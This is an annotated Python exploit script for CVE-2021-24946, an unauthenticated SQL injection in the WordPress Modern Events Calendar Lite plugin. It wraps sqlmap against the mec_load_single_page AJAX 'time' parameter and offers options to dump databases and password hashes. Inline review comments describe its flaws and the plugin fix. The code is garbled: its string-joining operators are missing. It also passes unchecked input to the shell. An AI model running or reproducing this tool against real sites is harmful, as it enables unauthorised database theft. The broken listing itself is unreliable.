WordPress 现代活动日历 6.1 SQL 注入


# 版本:<= 6.1

# 测试环境:Ubuntu 20.04

# CVE:CVE-2021-24946

# CWE:CWE-89

# 文档:https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24946/README.md

'''

描述:

Modern Events Calendar Lite WordPress 插件在 6.1.5 之前的版本中,将 time 参数用于 mec_load_single_page AJAX 操作的 SQL 语句之前,没有对其进行清理和转义;该 AJAX 操作对未经身份验证的用户开放,因此导致未经身份验证的 SQL 注入问题。

'''

# Proof-of-concept wrapper for the SQL injection described in the page header
# (CVE-2021-24946). The script does not send the request itself: it assembles a
# sqlmap command line from command-line arguments plus one interactive answer
# and hands that string to the shell. The fix on the vulnerable site is the
# plugin update the description above refers to (6.1.5 or later).
banner = '''

 .oOOOo.  o      'O o.OOoOoo                                                                                   
.O     o  O       o  O                 .oOOo. .oOOo. .oOOo.  oO             .oOOo. o   O  .oOOo. o   O  .oOOo. 
o         o       O  o                      O O    o      O   O                  O O   o  O    o O   o  O      
o         o       o  ooOO                   o o    O      o   o                  o o   o  o    O o   o  o      
o         O      O'  O       ooooooooo     O' o    o     O'   O   ooooooooo     O' OooOOo `OooOo OooOOo OoOOo. 
O         `o    o    o                    O   O    O    O     o                O       O       O     O  O    O 
`o     .o  `o  O     O                  .O    o    O  .O      O              .O        o       o     o  O    o 
 `OoooO'    `o'     ooOooOoO           oOoOoO `OooO' oOoOoO OooOO           oOoOoO     O  `OooO'     O  `OooO' 
                                                                                                               
                                                        [ ] Modern Events Calendar Lite SQL-Injection
                                                        [@] Developed by Ron Jost (Hacker5preme)

'''

# Cosmetic start-up banner; printed before the imports below are even executed.
print(banner)

import requests  # imported but never used anywhere in this script
import argparse
from datetime import datetime
import os

# User-Input:
# None of the three arguments is marked required or validated: a missing value
# arrives as None and is later interpolated into the URL as the literal text
# "None". -P is typed as str, so a non-numeric port is not rejected either.
my_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events Calendar SQL-Injection (unauthenticated)')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH


# Exploit:
# NOTE(review): on this line and on the exploitcode_url, exploitcode and final
# print lines the operands are separated only by runs of spaces — the '+'
# operators appear to have been lost when the listing was extracted, so the
# code as shown is a SyntaxError. Presumably the original used '+'; confirm
# against the linked repository before relying on this listing.
print('[*] Starting Exploit at: '   str(datetime.now().strftime('%H:%M:%S')))
print('[*] Payload for SQL-Injection:')
# The target URL is built from the raw -T/-P/-U values. wp_path is used
# verbatim, so it has to end with '/' for the 'wp-admin/...' suffix to resolve.
# The request pattern (GET admin-ajax.php with action=mec_load_single_page and
# an attacker-controlled 'time' value) is also the thing a defender would key
# log or WAF rules on.
exploitcode_url = r'sqlmap "http://'   target_ip   ':'   target_port   wp_path   r'wp-admin/admin-ajax.php?action=mec_load_single_page&time=2" '
exploitcode_risk = ' -p time'  # restricts sqlmap's testing to the 'time' parameter
print('    Sqlmap options:')
print('     -a, --all           Retrieve everything')
print('     -b, --banner        Retrieve DBMS banner')
print('     --current-user      Retrieve DBMS current user')
print('     --current-db        Retrieve DBMS current database')
print('     --passwords         Enumerate DBMS users password hashes')
print('     --tables            Enumerate DBMS database tables')
print('     --columns           Enumerate DBMS database table column')
print('     --schema            Enumerate DBMS schema')
print('     --dump              Dump DBMS database table entries')
print('     --dump-all          Dump all DBMS databases tables entries')
# The interactive answer is spliced unchecked into the shell command below, as
# are the command-line arguments above. Anything beyond a plain sqlmap flag
# (shell metacharacters, extra arguments) is executed by the operator's own
# shell — a command-injection hazard in the tool itself. A list-form
# subprocess call with an allow-list of the options printed above would
# remove it.
retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')
exploitcode = exploitcode_url    retrieve_mode   exploitcode_risk
# os.system runs the string through the system shell; its return status is
# discarded, so a failed or missing sqlmap is only visible in sqlmap's output.
os.system(exploitcode)
print('Exploit finished at: '   str(datetime.now().strftime('%H:%M:%S')))
